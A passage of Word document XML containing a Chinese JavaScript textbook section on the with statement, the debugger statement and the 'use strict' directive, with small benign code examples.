      </w:r>
      <w:r>
        <w:t>代码非常难于优化，并且同没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句的代码相比，它运行得更慢。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在对象嵌套层次很深的时候通常会使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句来简化代码编写。例如，在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>，可能会使用类似下面这种表达式来访问一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单中的元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.forms[0].address.value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果这种表达式在代码中多次出现，则可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句将</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>对象添加至作用域链的顶层：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>with(document.forms[0]){//</w:t>
      </w:r>
      <w:r>
        <w:t>直接访问表单元素，例如</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name.value="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>address.value="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>email.value="";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这种方法减少了大量的输入，不用再为每个属性名添加</w:t>
      </w:r>
      <w:r>
        <w:t>document.forms[0]</w:t>
      </w:r>
      <w:r>
        <w:t>前缀。这个对象临时挂载在作用域链上，当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>需要解析诸如</w:t>
      </w:r>
      <w:r>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:t>的标识符时，就会自动在这个对象中查找。当然，不使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句的等价代码可以写成这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=document.forms[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.name.value="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.address.value="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.email.value="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不要忘记，只有在查找标识符的时候才会用到作用域链，创建新的变量的时候不使用它，看一下下面这行代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>with(o)x=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>有一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，那么这行代码给这个属性赋值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。但如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中没有定义属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，这段代码和不使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句的代码</w:t>
      </w:r>
      <w:r>
        <w:t>x=1</w:t>
      </w:r>
      <w:r>
        <w:t>是一模一样的。它给一个局部变量或者全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>赋值，或者创建全局对象的一个新属性。</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句提供了一种读取</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性的快捷方式，但它并不能创建</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="5_7_2_debuggerYu_Ju_"/>
      <w:r>
        <w:t>5.7.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>debugger</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>debugger</w:t>
      </w:r>
      <w:r>
        <w:t>语句通常什么也不做。然而，当调试程序可用并运行的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器将会（非必需）以调式模式运行。实际上，这条语句用来产生一个断点（</w:t>
      </w:r>
      <w:r>
        <w:t>breakpoint</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的执行会停止在断点的位置，这时可以使用调试器输出变量的值、检查调用栈等。例如，假设由于调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>的时候使用了未定义的参数，因此</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>抛出一个异常，但无法定位到底是哪里抛出了异常。为了有助于调试这个问题，需要修改函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o===undefined)debugger;//</w:t>
      </w:r>
      <w:r>
        <w:t>这一行代码只是用于临时调试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>...//</w:t>
      </w:r>
      <w:r>
        <w:t>函数的其他部分</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这时</w:t>
      </w:r>
      <w:r>
        <w:t>，当调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>的时候没有传入参数，程序将停止执行，这时可以通过调试器检测调用栈并找出错误产生的原因。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>debugger</w:t>
      </w:r>
      <w:r>
        <w:t>语句正式加入到这门语言里。但在相当长的一段时间里，主流浏览器厂商已经将其实现了。注意，可用的调试器是远远不够的，</w:t>
      </w:r>
      <w:r>
        <w:t>debugger</w:t>
      </w:r>
      <w:r>
        <w:t>语句不会启动调试器。但如果调试器已经在运行中，这条语句才会真正产生一个断点。例如，如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的调试扩展插件</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>，则必须首先为待调试的网页启用</w:t>
      </w:r>
      <w:r>
        <w:t>Friebug</w:t>
      </w:r>
      <w:r>
        <w:t>，这样</w:t>
      </w:r>
      <w:r>
        <w:t>debugger</w:t>
      </w:r>
      <w:r>
        <w:t>语句才能正常工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="5_7_3__use_strict_"/>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>"us</w:t>
      </w:r>
      <w:r>
        <w:t>e strict"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>引入的一条指令。指令不是语句（但非常接近于语句）。</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令和普通的语句之间有两个重要的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它不包含任何语言的关键字，指令仅仅是一个包含一个特殊字符串直接量的表达式（可以是使用单引号也可以使用双引号），对于那些没有实现</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器来说，它只是一条没有副作用的表达式语句，它什么也没做。将来的</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准希望将</w:t>
      </w:r>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t>用做关键字，这样就可以省略引号了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它只能出现在脚本代码的开始或者函数体的开始、任何实体语句之前。但它不必一定出现在脚本的首行或函数体内的首行，因为</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令之后或之前都可能有其他字符串直接量表达式语句，并且</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的具体实现可能将它们解析为解释器自有的指令。在脚本或者函数体内第一条常规语句之后字符串直接量表达式语句只当做普通的表达式语句对待；它们不会当做指令解析，它们也没有任何副作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令的目的是说明（脚本或函数中）后续的代码将会解析为严格代码（</w:t>
      </w:r>
      <w:r>
        <w:t>strict code</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果顶层</w:t>
      </w:r>
      <w:r>
        <w:t>（不在任何函数内的）代码使用了</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令，那么它们就是严格代码。如果函数体定义所处的代码是严格代码或者函数体使用了</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令，那么函数体的代码也是严格代码。如果</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>调用时所处的代码是严格代码或者</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>要执行的字符串中使用了</w:t>
      </w:r>
      <w:r>
        <w:t>"scrict code"</w:t>
      </w:r>
      <w:r>
        <w:t>指令，则</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>内的代码是严格代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>严格代码以严格模式执行。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的严格模式是该语言的一个受限制的子集，它修正了语言的重要缺陷，并提供健壮的查错功能和增强的安全机制。严格模式和非严格模式之</w:t>
      </w:r>
      <w:r>
        <w:t>间的区别如下（前三条尤为重要）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，所有的变量都要先声明，如果给一个未声明的变量、函数、函数参数、</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句参数或全局对象的属性赋值，将会抛出一个引用错误异常（在非严格模式中，这种隐式声明的全局变量的方法是给全局对象新添加一个新属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，调用的函数（不是方法）中的一个</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。（在非严格模式中，调用的函数中的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值总是全局对象）。可以利用这种特性来判断</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现是否支持严格模式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>同样，在严格模</w:t>
      </w:r>
      <w:r>
        <w:t>式中，当通过</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>来调用函数时，其中的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值就是通过</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>传入的第一个参数（在非严格模式中，</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值被全局对象和转换为对象的非对象值所代替）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，给只读属性赋值和给不可扩展的对象创建新成员都将抛出一个类型错误异常（在非严格模式中，这些操作只是简单地操作失败，不会报错）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，传入</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的代码不能在调用程序所在的上下文中声明变量或定义函数，而在非严格模式中是可以这样做的。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>相反，变量和函数的定义是在</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的新作用域中，这个作用域在</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>返回时就弃用了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hasStrictMode=(function(){"use strict";return this===undefined}());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，函数里的</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象（见</w:t>
      </w:r>
      <w:r>
        <w:t>8.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）拥有传入函数值的静态副本。在非严格模式中，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象具有</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>魔术般</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的行为，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>里的数组元素和函数参数都是指向同一个值的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，当</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符后跟随非法的标识符（比如变量、函数、函数参数）时，将</w:t>
      </w:r>
      <w:r>
        <w:t>会抛出一个语法错误异常（在非严格模式中，这种</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>表达式什么也没做，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，试图删除一个不可配置的属性将抛出一个类型错误异常（在非严格模式中，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>表达式操作失败，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，在一个对象直接量中定义两个或多个同名属性将产生一个语法错误（在非严格模式中不会报错）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，函数声明中存在两个或多个同名的参数将产生一个语法错误（在非严格模式中不会报错）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中是不允许使用八进制整数直接量（以</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀）的（在非</w:t>
      </w:r>
      <w:r>
        <w:t>严格模式中某些实现是允许八进制整数直接量的）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中，标识符</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>当做关键字，它们的值是不能更改的。不能给这些标识符赋值，也不能把它们声明为变量、用做函数名、用做函数参数或用做</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>块的标识符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式中限制了对调用栈的检测能力，在严格模式的函数中，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.caller</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.callee</w:t>
      </w:r>
      <w:r>
        <w:t>都会抛出一个类型错误异常。严格模式的函数同样具有</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>属性，当访问这两个属性时将抛出类型错误异常（有一些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实</w:t>
      </w:r>
      <w:r>
        <w:t>现在非严格模式里定义了这些非标准的属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="5_8_JavaScriptYu_Ju_Xiao_Jie_"/>
      <w:r>
        <w:t>5.8</w:t>
      </w:r>
